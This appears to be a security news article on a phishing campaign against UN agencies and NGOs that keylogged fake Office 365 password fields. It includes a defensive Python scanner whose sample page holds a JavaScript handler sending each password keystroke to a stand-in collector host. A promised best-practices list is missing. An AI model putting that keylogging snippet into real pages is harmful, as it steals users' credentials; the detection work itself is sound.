Threat actors launched phishing attempts against several humanitarian and non-governmental organizations, including several of the aid arms of the United Nations, such as the United Nations Children's Fund (UNICEF) and the UN World Food Programme, as well as other notable groups like the International Federation of Red Cross and Red Crescent Societies. Lookout researchers revealed the existence of the phishing attacks.
The campaign has apparently been active since March 2019, with the two domains used to host the malware variants being associated with an IP network block and an ASN (Autonomous System Number) that were found to have also previously hosted malware.
The phishing pages used by the threat actors include code that detects if the user visiting the site is using a mobile device, in which case mobile-specific content is displayed. Keylogging functionality was also found in the password field, allowing the threat actors to retrieve passwords even if visitors to the site do not actually complete the login process. The password, along with the user email, is then sent to a command-and-control (C&C) server.
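A defender triaging a saved copy of a suspected login page can look for the keystroke-capture behaviour described above. The following is an added example, not code from Lookout, Trend Micro or the campaign itself; the function names, the heuristics and both sample pages are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

KEY_ATTRS = {"onkeyup", "onkeydown", "onkeypress", "oninput"}
KEY_LISTENER = re.compile(r"""addEventListener\(\s*['"](keyup|keydown|keypress|input)['"]|\.on(keyup|keydown|keypress|input)\s*=""")
NETWORK_SINK = re.compile(r"fetch\s*\(|XMLHttpRequest|sendBeacon|\$\.(post|ajax)")

class PageScan(HTMLParser):
    """Collect password-field ids/names, their inline key handlers, and inline scripts."""
    def __init__(self):
        super().__init__()
        self.pw_refs, self.handlers, self.scripts = set(), [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.pw_refs.update(v for v in (a.get("id"), a.get("name")) if v)
            self.handlers += [v for k, v in a.items() if k in KEY_ATTRS and v]
        elif tag == "script" and "src" not in a:
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data

def scan(html):
    """Return triage findings for per-keystroke capture of a password field (heuristic)."""
    page = PageScan()
    page.feed(html)
    findings = [f"inline key handler on password field: {h[:40]}" for h in page.handlers]
    for js in page.scripts:
        touches_pw = any(r in js for r in page.pw_refs) or "type=password" in re.sub(r"['\"]", "", js)
        if touches_pw and KEY_LISTENER.search(js) and NETWORK_SINK.search(js):
            findings.append("script hooks key events on a password field and makes a network call")
    return findings

# Constructed sample pages (not taken from the campaign).
SUSPECT = """<form><input type="email" id="user"><input type="password" id="pass"></form>
<script>document.getElementById("pass").addEventListener("keyup", function (e) {
  fetch("https://collector.example.invalid/k", {method: "POST", body: e.target.value}); });</script>"""
BENIGN = """<form id="login"><input type="password" name="pw"></form>
<script>document.getElementById("login").addEventListener("submit", function () {
  fetch("/session", {method: "POST"}); });</script>"""
```

The check only reads inline markup and scripts, so a handler loaded from an external file is not seen, and a legitimate password-strength meter can trigger the inline-handler finding; treat the output as a prompt for manual review.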
To make the attacks more convincing, users are redirected to legitimate-looking PDFs and other types of documents once they enter their credentials on the fake login pages. The fake pages also employ SSL certificates, with six of these still valid until November — an indication that, according to Lookout, the campaign might still be ongoing.
Credential phishing itself is still widely used, accounting for 40% of the total high-risk email threats of 2018 detected by Trend Micro Cloud App Security, with attacks involving Microsoft Office 365 (which was used for the login pages in this incident) on the rise.
Social engineering can take many forms — many of which need only a working knowledge of how people think and act. These kinds of scams can prove extremely lucrative for threat actors — hence their popularity. The following best practices can help organizations protect themselves from social engineering attacks:
To bolster their security capabilities and further protect their end users, organizations can consider security products such as the Trend Micro™ Cloud App Security™ solution, which uses machine learning (ML) to help detect and block phishing attempts. If a suspected phishing email is received by an employee, it will go through sender, content, and URL reputation analysis, which is followed by an inspection of the remaining URLs using computer vision and AI to check if website components are being spoofed. The solution can also detect suspicious content in the message body and attachments, and provide sandbox malware analysis and document exploit detection.